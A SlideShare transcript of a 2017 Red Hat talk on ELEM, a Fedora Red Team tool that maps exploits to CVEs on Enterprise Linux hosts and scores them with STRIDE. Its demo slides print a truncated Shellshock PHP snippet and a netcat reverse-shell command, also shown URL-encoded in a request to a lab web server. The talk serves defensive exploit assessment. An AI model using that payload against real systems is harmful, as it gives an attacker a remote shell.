SlideShare a Scribd company logo
ENTERPRISE LINUX EXPLOIT MAPPER
Simplifying Exploit Assessment
Kenneth D. Evensen
Solutions Architect
Jason Callaway
Principal Solutions Architect
ORIGINS OF THE TERM CYBER
Red Hat Defense in Depth 2017 - The Enterprise Linux Exploit Mapper (ELEM) and Demo2
Red Hat Defense in Depth 2017 - The Enterprise Linux Exploit Mapper (ELEM) and Demo3
Red Hat Defense in Depth 2017 - The Enterprise Linux Exploit Mapper (ELEM) and Demo4
https://fas.org/sgp/library/pccip.pdf
Red Hat Defense in Depth 2017 - The Enterprise Linux Exploit Mapper (ELEM) and Demo5
https://fas.org/sgp/library/pccip.pdf https://flic.kr/p/5Vso5o
Red Hat Defense in Depth 2017 - The Enterprise Linux Exploit Mapper (ELEM) and Demo6
Red Hat Defense in Depth 2017 - The Enterprise Linux Exploit Mapper (ELEM) and Demo7
Red Hat Defense in Depth 2017 - The Enterprise Linux Exploit Mapper (ELEM) and Demo8
https://fedoraproject.org/wiki/SIGs/Red_Team
Stuff we do (or will do, anyway)
Red Hat Defense in Depth 2017 - The Enterprise Linux Exploit Mapper (ELEM) and Demo9
FEDORA RED TEAM
• Offensive tooling
• Security Data API
• Fedora Cyber Test Lab
• Exploit curation
• Standards
• Reference architectures
First team meeting on Freenode IRC
#fedora-security
Friday, 6 October 2017, 10am Eastern
ENTERPRISE LINUX EXPLOIT MAPPER
MOTIVATION
Red Hat Defense in Depth 2017 - The Enterprise Linux Exploit Mapper (ELEM) and Demo11
To provide a comprehensive assessment of known exploits in the wild
against known CVE’s on an Enterprise Linux host.
The Tool - https://github.com/fedoraredteam/elem
ELEM
The Curation Data - https://github.com/fedoraredteam/elem-curation
ELEM CURATION
Red Hat Defense in Depth 2017 - The Enterprise Linux Exploit Mapper (ELEM) and Demo12
GitHub – Fedora Red Team
OPEN SOURCE PROJECTS
NIST Maintained U.S. Government repository of vulnerability data
Vulnerabilities are scored using CVSS - Common Vulnerability Scoring System
NATIONAL VULNERABILITY DATABASE
Mitre Corporation standardized identification and tracking for known vulnerabilities.
Provides description and references for the vulnerability.
COMMON VULNERABILITIES AND EXPOSURES
A library of known exploits curated by Offensive Security, LTD.
Exploits are often referenced by Mitre’s CVE database.
OFFENSIVE SECURITY EXPLOIT DATABASE
Red Hat Defense in Depth 2017 - The Enterprise Linux Exploit Mapper (ELEM) and Demo13
RELEVANT DATA SOURCES
Red Hat Defense in Depth 2017 - The Enterprise Linux Exploit Mapper (ELEM) and Demo14
Maintained by Red Hat Product Security
• List known CVE’s relevant to Red Hat software
• Provide CVSS scoring from NIST
• Base Score
• Attack Vector
• Provide customers with guidance for remediation
https://access.redhat.com/labs/securitydataapi
RED HAT SECURITY DATA API
Red Hat Defense in Depth 2017 - The Enterprise Linux Exploit Mapper (ELEM) and Demo15
ELEM - THEORY OF OPERATION
Determine which vulnerabilities apply to a specific host
Information comes from Red Hat’s Security Data API
ASSESS
Set up a known exploit to be executed
STAGE
Simply and comprehensively score the exploit
SCORE
Red Hat Defense in Depth 2017 - The Enterprise Linux Exploit Mapper (ELEM) and Demo16
ELEM - THEORY OF OPERATION
Break Down of Demonstration
https://msdn.microsoft.com/en-us/library/ee823878(v=cs.20).aspx
Red Hat Defense in Depth 2017 - The Enterprise Linux Exploit Mapper (ELEM) and Demo17
SCORING WITH STRIDE
• Spoofing identity. An example of identity spoofing is illegally accessing and then using another
user's authentication information, such as username and password.
• Tampering with data. Data tampering involves the malicious modification of data. Examples
include unauthorized changes made to persistent data, such as that held in a database, and the
alteration of data as it flows between two computers over an open network, such as the Internet.
• Repudiation. Repudiation threats are associated with users who deny performing an action
without other parties having any way to prove otherwise—for example, a user performs an illegal
operation in a system that lacks the ability to trace the prohibited
operations. Nonrepudiation refers to the ability of a system to counter repudiation threats. For
example, a user who purchases an item might have to sign for the item upon receipt. The vendor
can then use the signed receipt as evidence that the user did receive the package.
https://msdn.microsoft.com/en-us/library/ee823878(v=cs.20).aspx
Red Hat Defense in Depth 2017 - The Enterprise Linux Exploit Mapper (ELEM) and Demo18
SCORING WITH STRIDE
• Information disclosure. Information disclosure threats involve the exposure of information to
individuals who are not supposed to have access to it—for example, the ability of users to read a
file that they were not granted access to, or the ability of an intruder to read data in transit
between two computers.
• Denial of service. Denial of service (DoS) attacks deny service to valid users—for example, by
making a Web server temporarily unavailable or unusable. You must protect against certain types
of DoS threats simply to improve system availability and reliability.
• Elevation of privilege. In this type of threat, an unprivileged user gains privileged access and
thereby has sufficient access to compromise or destroy the entire system. Elevation of privilege
threats include those situations in which an attacker has effectively penetrated all system
defenses and become part of the trusted system itself, a dangerous situation indeed.
DEMO
Red Hat Defense in Depth 2017 - The Enterprise Linux Exploit Mapper (ELEM) and Demo20
https://youtu.be/NX931nfyAmg
This exploit is somewhat contrived and we probably wouldn’t see it this way
in production.
SHOCK.PHP
<pre>
<?php
function shellshock($cmd) { // Execute a command via CVE-2014-6271 @ mail.c:283
if(strstr(readlink("/bin/sh"), "bash") != FALSE) {
...
putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
....
?>
Red Hat Defense in Depth 2017 - The Enterprise Linux Exploit Mapper (ELEM) and Demo21
Invoke netcat on the target to create a connection back to the attacking host
 nc -nv 172.16.78.1 4444 -e /bin/bash
THE SCENARIO
http://rhel7.local.kenscloud.io/shock.php?cmd=nc%20-
nv%20172.16.78.1%204444%20-e%20/bin/bash
Red Hat Defense in Depth 2017 - The Enterprise Linux Exploit Mapper (ELEM) and Demo22
Ken’s Macbook Pro Ken’s RHEL 7 VM
with a Web Server
Malicious Web
Request Process the
Web Request
Shell Connection
Returned
Scores are sub-catagorized by Common Platform Enumeration (CPE)
notation. The theory is that an exploit on RHEL 7.0 Server may work better
or worse then RHEL 7.1 Desktop. The CPE is auto detected on a RHEL
host.
SCORING AN EXPLOIT
elem score --kind stride --value 0000009 --edbid 35370
Red Hat Defense in Depth 2017 - The Enterprise Linux Exploit Mapper (ELEM) and Demo23
SYSTEM
ADMINISTRATORS
SECURITY
RESEARCHERS PENETRATION TESTER
Red Hat Defense in Depth 2017 - The Enterprise Linux Exploit Mapper (ELEM) and Demo24
Determine and characterize the
threat of known exploits by using
testing and scoring exploits
Quickly assess a target host
decreasing time spent in a
penetration test
Understand what vulnerabilities
exist in their environment and
implement corrective action
Useful to Different Stakeholders
BROAD USER BASE
plus.google.com/+RedHat
linkedin.com/company/red-hat
youtube.com/user/RedHatVideos
facebook.com/redhatinc
twitter.com/RedHatNews
THANK YOU

More Related Content

PDF
Open Source Incidents
PPT
Hackfest Cracking Crypto Rev 2
PDF
Syrian Malware
PPTX
Living off the land and fileless attack techniques
PDF
The Finest Penetration Testing Framework for Software-Defined Networks
PDF
【HITCON FreeTalk 2018 - Spectre & Meltdown 漏洞的修補策略與 risk mitigation】
PDF
DeepLocker - Concealing Targeted Attacks with AI Locksmithing
PPTX
Deploying a Shadow Threat Intel Capability at CaralinaCon on March 6, 2016
Open Source Incidents
Hackfest Cracking Crypto Rev 2
Syrian Malware
Living off the land and fileless attack techniques
The Finest Penetration Testing Framework for Software-Defined Networks
【HITCON FreeTalk 2018 - Spectre & Meltdown 漏洞的修補策略與 risk mitigation】
DeepLocker - Concealing Targeted Attacks with AI Locksmithing
Deploying a Shadow Threat Intel Capability at CaralinaCon on March 6, 2016

What's hot (13)

PDF
【HITCON FreeTalk 2018 - 從晶片設計角度看硬體安全】
PDF
The Rising Threat of Fileless Malware
PDF
The Duqu 2.0: Technical Details
PDF
AI & ML in Cyber Security - Why Algorithms are Dangerous
PDF
Behavior-Based Defense in ICS
PPTX
Open Source Insight: NVD's New Look, Struts Vuln Ransomware & Google Open So...
PPTX
Spectre and Meltdown
PPT
Proposal defense presentation
PPTX
【HITCON Hackathon 2017】 TrendMicro Datasets
PPTX
Deploying a Shadow Threat Intel Capability at Thotcon on May 6, 2016
PDF
Automatiza las detecciones de amenazas y evita falsos positivos
PDF
What you need to know about ExPetr ransomware
PPT
Chapter 09
【HITCON FreeTalk 2018 - 從晶片設計角度看硬體安全】
The Rising Threat of Fileless Malware
The Duqu 2.0: Technical Details
AI & ML in Cyber Security - Why Algorithms are Dangerous
Behavior-Based Defense in ICS
Open Source Insight: NVD's New Look, Struts Vuln Ransomware & Google Open So...
Spectre and Meltdown
Proposal defense presentation
【HITCON Hackathon 2017】 TrendMicro Datasets
Deploying a Shadow Threat Intel Capability at Thotcon on May 6, 2016
Automatiza las detecciones de amenazas y evita falsos positivos
What you need to know about ExPetr ransomware
Chapter 09
Ad

Similar to Enterprise Linux Exploit Mapper (ELEM) Demo (20)

PDF
Threat-Based Adversary Emulation with MITRE ATT&CK
PPTX
InOffensive Security_cybersecurity2.pptx
PPTX
Linux remote
PDF
Ceh v5 module 18 linux hacking
DOC
Days of the Honeynet: Attacks, Tools, Incidents
PPTX
Ethical hacking Chapter 9 - Linux Vulnerabilities - Eric Vanderburg
PDF
Vulnerability assessment on cyber security
PDF
Getting Bear-y Cozy with PowerShell
PDF
Red Team: Emulating Advanced Adversaries in Cyberspace
PDF
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
PDF
ENPM808 Independent Study Final Report - amaster 2019
PDF
Intro to Exploitation
PDF
MITRE_ATTACK_Enterprise_11x17.pdf
PPTX
Abusing "Accepted Risk" With 3rd Party C2 - HackMiamiCon5
PDF
Slideshare.net rh-isac summit 2019 - adam pennington - leveraging mitre at ta...
PPT
cyber sec.ppt
PDF
Realities of Security in the Cloud
PPTX
Bridging the Gap
PDF
Remote security with Red Hat Enterprise Linux
PDF
Intrusion Discovery Cheat Sheet for Linux
Threat-Based Adversary Emulation with MITRE ATT&CK
InOffensive Security_cybersecurity2.pptx
Linux remote
Ceh v5 module 18 linux hacking
Days of the Honeynet: Attacks, Tools, Incidents
Ethical hacking Chapter 9 - Linux Vulnerabilities - Eric Vanderburg
Vulnerability assessment on cyber security
Getting Bear-y Cozy with PowerShell
Red Team: Emulating Advanced Adversaries in Cyberspace
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
ENPM808 Independent Study Final Report - amaster 2019
Intro to Exploitation
MITRE_ATTACK_Enterprise_11x17.pdf
Abusing "Accepted Risk" With 3rd Party C2 - HackMiamiCon5
Slideshare.net rh-isac summit 2019 - adam pennington - leveraging mitre at ta...
cyber sec.ppt
Realities of Security in the Cloud
Bridging the Gap
Remote security with Red Hat Enterprise Linux
Intrusion Discovery Cheat Sheet for Linux
Ad

Recently uploaded (20)

PDF
Raksha Bandhan Grocery Pricing Trends in India 2025.pdf
PPTX
Odoo POS Development Services by CandidRoot Solutions
PDF
Design an Analysis of Algorithms II-SECS-1021-03
PPTX
Lecture 3: Operating Systems Introduction to Computer Hardware Systems
PDF
Design an Analysis of Algorithms I-SECS-1021-03
PDF
wealthsignaloriginal-com-DS-text-... (1).pdf
PDF
PTS Company Brochure 2025 (1).pdf.......
PDF
Upgrade and Innovation Strategies for SAP ERP Customers
PDF
Wondershare Filmora 15 Crack With Activation Key [2025
PDF
Understanding Forklifts - TECH EHS Solution
PDF
2025 Textile ERP Trends: SAP, Odoo & Oracle
PPTX
Operating system designcfffgfgggggggvggggggggg
PPTX
history of c programming in notes for students .pptx
PDF
Navsoft: AI-Powered Business Solutions & Custom Software Development
PDF
System and Network Administration Chapter 2
PDF
Claude Code: Everyone is a 10x Developer - A Comprehensive AI-Powered CLI Tool
PPTX
CHAPTER 2 - PM Management and IT Context
PDF
T3DD25 TYPO3 Content Blocks - Deep Dive by André Kraus
PPTX
Agentic AI : A Practical Guide. Undersating, Implementing and Scaling Autono...
PDF
top salesforce developer skills in 2025.pdf
Raksha Bandhan Grocery Pricing Trends in India 2025.pdf
Odoo POS Development Services by CandidRoot Solutions
Design an Analysis of Algorithms II-SECS-1021-03
Lecture 3: Operating Systems Introduction to Computer Hardware Systems
Design an Analysis of Algorithms I-SECS-1021-03
wealthsignaloriginal-com-DS-text-... (1).pdf
PTS Company Brochure 2025 (1).pdf.......
Upgrade and Innovation Strategies for SAP ERP Customers
Wondershare Filmora 15 Crack With Activation Key [2025
Understanding Forklifts - TECH EHS Solution
2025 Textile ERP Trends: SAP, Odoo & Oracle
Operating system designcfffgfgggggggvggggggggg
history of c programming in notes for students .pptx
Navsoft: AI-Powered Business Solutions & Custom Software Development
System and Network Administration Chapter 2
Claude Code: Everyone is a 10x Developer - A Comprehensive AI-Powered CLI Tool
CHAPTER 2 - PM Management and IT Context
T3DD25 TYPO3 Content Blocks - Deep Dive by André Kraus
Agentic AI : A Practical Guide. Undersating, Implementing and Scaling Autono...
top salesforce developer skills in 2025.pdf

Enterprise Linux Exploit Mapper (ELEM) Demo

  • 1. ENTERPRISE LINUX EXPLOIT MAPPER Simplifying Exploit Assessment Kenneth D. Evensen Solutions Architect Jason Callaway Principal Solutions Architect
  • 2. ORIGINS OF THE TERM CYBER Red Hat Defense in Depth 2017 - The Enterprise Linux Exploit Mapper (ELEM) and Demo2
  • 3. Red Hat Defense in Depth 2017 - The Enterprise Linux Exploit Mapper (ELEM) and Demo3
  • 4. Red Hat Defense in Depth 2017 - The Enterprise Linux Exploit Mapper (ELEM) and Demo4 https://fas.org/sgp/library/pccip.pdf
  • 5. Red Hat Defense in Depth 2017 - The Enterprise Linux Exploit Mapper (ELEM) and Demo5 https://fas.org/sgp/library/pccip.pdf https://flic.kr/p/5Vso5o
  • 6. Red Hat Defense in Depth 2017 - The Enterprise Linux Exploit Mapper (ELEM) and Demo6
  • 7. Red Hat Defense in Depth 2017 - The Enterprise Linux Exploit Mapper (ELEM) and Demo7
  • 8. Red Hat Defense in Depth 2017 - The Enterprise Linux Exploit Mapper (ELEM) and Demo8 https://fedoraproject.org/wiki/SIGs/Red_Team
  • 9. Stuff we do (or will do, anyway) Red Hat Defense in Depth 2017 - The Enterprise Linux Exploit Mapper (ELEM) and Demo9 FEDORA RED TEAM • Offensive tooling • Security Data API • Fedora Cyber Test Lab • Exploit curation • Standards • Reference architectures First team meeting on Freenode IRC #fedora-security Friday, 6 October 2017, 10am Eastern
  • 11. MOTIVATION Red Hat Defense in Depth 2017 - The Enterprise Linux Exploit Mapper (ELEM) and Demo11 To provide a comprehensive assessment of known exploits in the wild against known CVE’s on an Enterprise Linux host.
  • 12. The Tool - https://github.com/fedoraredteam/elem ELEM The Curation Data - https://github.com/fedoraredteam/elem-curation ELEM CURATION Red Hat Defense in Depth 2017 - The Enterprise Linux Exploit Mapper (ELEM) and Demo12 GitHub – Fedora Red Team OPEN SOURCE PROJECTS
  • 13. NIST Maintained U.S. Government repository of vulnerability data Vulnerabilities are scored using CVSS - Common Vulnerability Scoring System NATIONAL VULNERABILITY DATABASE Mitre Corporation standardized identification and tracking for known vulnerabilities. Provides description and references for the vulnerability. COMMON VULNERABILITIES AND EXPOSURES A library of known exploits curated by Offensive Security, LTD. Exploits are often referenced by Mitre’s CVE database. OFFENSIVE SECURITY EXPLOIT DATABASE Red Hat Defense in Depth 2017 - The Enterprise Linux Exploit Mapper (ELEM) and Demo13 RELEVANT DATA SOURCES
  • 14. Red Hat Defense in Depth 2017 - The Enterprise Linux Exploit Mapper (ELEM) and Demo14 Maintained by Red Hat Product Security • List known CVE’s relevant to Red Hat software • Provide CVSS scoring from NIST • Base Score • Attack Vector • Provide customers with guidance for remediation https://access.redhat.com/labs/securitydataapi RED HAT SECURITY DATA API
  • 15. Red Hat Defense in Depth 2017 - The Enterprise Linux Exploit Mapper (ELEM) and Demo15 ELEM - THEORY OF OPERATION
  • 16. Determine which vulnerabilities apply to a specific host Information comes from Red Hat’s Security Data API ASSESS Set up a known exploit to be executed STAGE Simply and comprehensively score the exploit SCORE Red Hat Defense in Depth 2017 - The Enterprise Linux Exploit Mapper (ELEM) and Demo16 ELEM - THEORY OF OPERATION Break Down of Demonstration
  • 17. https://msdn.microsoft.com/en-us/library/ee823878(v=cs.20).aspx Red Hat Defense in Depth 2017 - The Enterprise Linux Exploit Mapper (ELEM) and Demo17 SCORING WITH STRIDE • Spoofing identity. An example of identity spoofing is illegally accessing and then using another user's authentication information, such as username and password. • Tampering with data. Data tampering involves the malicious modification of data. Examples include unauthorized changes made to persistent data, such as that held in a database, and the alteration of data as it flows between two computers over an open network, such as the Internet. • Repudiation. Repudiation threats are associated with users who deny performing an action without other parties having any way to prove otherwise—for example, a user performs an illegal operation in a system that lacks the ability to trace the prohibited operations. Nonrepudiation refers to the ability of a system to counter repudiation threats. For example, a user who purchases an item might have to sign for the item upon receipt. The vendor can then use the signed receipt as evidence that the user did receive the package.
  • 18. https://msdn.microsoft.com/en-us/library/ee823878(v=cs.20).aspx Red Hat Defense in Depth 2017 - The Enterprise Linux Exploit Mapper (ELEM) and Demo18 SCORING WITH STRIDE • Information disclosure. Information disclosure threats involve the exposure of information to individuals who are not supposed to have access to it—for example, the ability of users to read a file that they were not granted access to, or the ability of an intruder to read data in transit between two computers. • Denial of service. Denial of service (DoS) attacks deny service to valid users—for example, by making a Web server temporarily unavailable or unusable. You must protect against certain types of DoS threats simply to improve system availability and reliability. • Elevation of privilege. In this type of threat, an unprivileged user gains privileged access and thereby has sufficient access to compromise or destroy the entire system. Elevation of privilege threats include those situations in which an attacker has effectively penetrated all system defenses and become part of the trusted system itself, a dangerous situation indeed.
  • 19. DEMO
  • 20. Red Hat Defense in Depth 2017 - The Enterprise Linux Exploit Mapper (ELEM) and Demo20 https://youtu.be/NX931nfyAmg
  • 21. This exploit is somewhat contrived and we probably wouldn’t see it this way in production. SHOCK.PHP <pre> <?php function shellshock($cmd) { // Execute a command via CVE-2014-6271 @ mail.c:283 if(strstr(readlink("/bin/sh"), "bash") != FALSE) { ... putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1"); .... ?> Red Hat Defense in Depth 2017 - The Enterprise Linux Exploit Mapper (ELEM) and Demo21
  • 22. Invoke netcat on the target to create a connection back to the attacking host  nc -nv 172.16.78.1 4444 -e /bin/bash THE SCENARIO http://rhel7.local.kenscloud.io/shock.php?cmd=nc%20- nv%20172.16.78.1%204444%20-e%20/bin/bash Red Hat Defense in Depth 2017 - The Enterprise Linux Exploit Mapper (ELEM) and Demo22 Ken’s Macbook Pro Ken’s RHEL 7 VM with a Web Server Malicious Web Request Process the Web Request Shell Connection Returned
  • 23. Scores are sub-catagorized by Common Platform Enumeration (CPE) notation. The theory is that an exploit on RHEL 7.0 Server may work better or worse then RHEL 7.1 Desktop. The CPE is auto detected on a RHEL host. SCORING AN EXPLOIT elem score --kind stride --value 0000009 --edbid 35370 Red Hat Defense in Depth 2017 - The Enterprise Linux Exploit Mapper (ELEM) and Demo23
  • 24. SYSTEM ADMINISTRATORS SECURITY RESEARCHERS PENETRATION TESTER Red Hat Defense in Depth 2017 - The Enterprise Linux Exploit Mapper (ELEM) and Demo24 Determine and characterize the threat of known exploits by using testing and scoring exploits Quickly assess a target host decreasing time spent in a penetration test Understand what vulnerabilities exist in their environment and implement corrective action Useful to Different Stakeholders BROAD USER BASE